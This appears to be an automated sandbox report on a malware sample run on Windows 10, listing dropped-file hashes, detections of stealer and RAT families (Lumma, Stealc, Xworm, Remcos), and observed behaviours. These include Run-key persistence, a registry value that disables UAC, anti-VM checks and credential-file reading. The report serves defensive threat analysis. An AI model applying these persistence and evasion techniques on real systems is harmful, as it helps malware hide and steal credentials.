| SHA512 | b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2 |
C:\Users\Admin\AppData\Local\Temp\nmgOwYDOvG2RpdB
| MD5 | 8a8ccc1934d0db8796b10e7aed4f0f3b |
| SHA1 | 8301c2213752b6caa28ecdb8473ae9824718fb52 |
| SHA256 | 4a413a957bcfe798fd9de8af17fac3ca2d631461336a1352448c061eca671f7e |
| SHA512 | f9b8c465a50b95366ea4e073f9e15762f3762572920a45713895681e28b90d7560b9949d8f543a5ea4c8c1863a9a61aa4622527cfad5d6650885542424cd2c50 |
C:\Users\Admin\AppData\Local\Temp\R5Uyia3MxMGwpJz
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\a\jy.exe
| MD5 | 21a8a7bf07bbe1928e5346324c530802 |
| SHA1 | d802d5cdd2ab7db6843c32a73e8b3b785594aada |
| SHA256 | dada298d188a98d90c74fbe8ea52b2824e41fbb341824c90078d33df32a25f3d |
| SHA512 | 1d05f474018fa7219c6a4235e087e8b72f2ed63f45ea28061a4ec63574e046f1e22508c017a0e8b69a393c4b70dfc789e6ddb0bf9aea5753fe83edc758d8a15f |
C:\Users\Admin\AppData\Local\Temp\a\test30.exe
| MD5 | e9289cac82968862715653ae5eb5d2a4 |
| SHA1 | 9f335c67384fc1c575fc02f959ce1f521507e6e1 |
| SHA256 | e2f0800a6b674891005a97942ff0cf8ab7082c2ecfc072d5c29cd87ecb1f09f6 |
| SHA512 | 81135caacfddd75979a22af40b9fa97653add7f94bb6bf8649a4c1494ed041cbe42eb8b2335a21099421bf02ed4ce589052800b7c8ab5d7a27e3329e8d7427fe |
C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
| MD5 | 4489c3282400ad9e96ea5ca7c28e6369 |
| SHA1 | 91a2016778cce0e880636d236efca38cf0a7713d |
| SHA256 | cc68b1903e22d22e6f0a29bcdf46825d5c57747d8eb3a75672a4d6930f60fe77 |
| SHA512 | adaeab8aa666057ff008e86f96ae6b9a36ff2f276fdd49f6663c300357f3dc10f59fac7700bb385aa35887918a830e18bddaa41b3305d913566f58aa428a72b0 |
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
| MD5 | bedd5e5f44b78c79f93e29dc184cfa3d |
| SHA1 | 11e7e692b9a6b475f8561f283b2dd59c3cd19bfd |
| SHA256 | e423c72ea1a279e367f4f0a3dc7d703c67f6d09009ed9d58f9c73dac35d0a85c |
| SHA512 | 3a7924196830b52d4525b897f45feb52ec2aca6cd20437b38437f171424450fd25692bd4c67ccde2cf147f0ed6efcef395ea0e13b24f0cf606214b58cf8284de |
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
| MD5 | 7ae9e9867e301a3fdd47d217b335d30f |
| SHA1 | d8c62d8d73aeee1cbc714245f7a9a39fcfb80760 |
| SHA256 | 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c |
| SHA512 | 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd |
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
| MD5 | e9a138d8c5ab2cccc8bf9976f66d30c8 |
| SHA1 | e996894168f0d4e852162d1290250dfa986310f8 |
| SHA256 | e63b41bfdd3a89b6ebcfc05db158fdc399dbc081e49b01498831a62df34defc3 |
| SHA512 | 5982fc759c8b1121ab5befaac53e1521931f06d276140195fa1fcbcd1069f546253e366ef4cc37245b3bc2ed60c4b8d0583f133a1264efd77938adf456a08ccc |
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
| MD5 | b80b665934cd6ef78a76380ab9fe7905 |
| SHA1 | 1a1ff6e87fa6c57a20e436d1f2e960b9a258c0c1 |
| SHA256 | 22d8b4a713ae8ea71143a411e9445a04f5b511c0bac7fcd42744a105a0d96485 |
| SHA512 | 731a5be1201902a2620e1ad1a5e6f2b385939ea4dd2d79dbf086ed8521ea8f3768a5fa496dfce4e9696c103536e2fbcea6728b8d9e7abf87e66b053e1b153c5e |
Analysis: behavioral7
Detonation Overview
Submitted
2024-12-12 18:16
Reported
2024-12-12 18:19
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
44Caliber
44Caliber family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1648 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 5948 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 3168 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 6676 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | C:\Windows\Explorer.EXE |
| PID 5788 created 608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kjksfm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2276_133785010355926678\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_2276_133785010355926678\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winutil.vbs | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
Checks installed software on the system
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
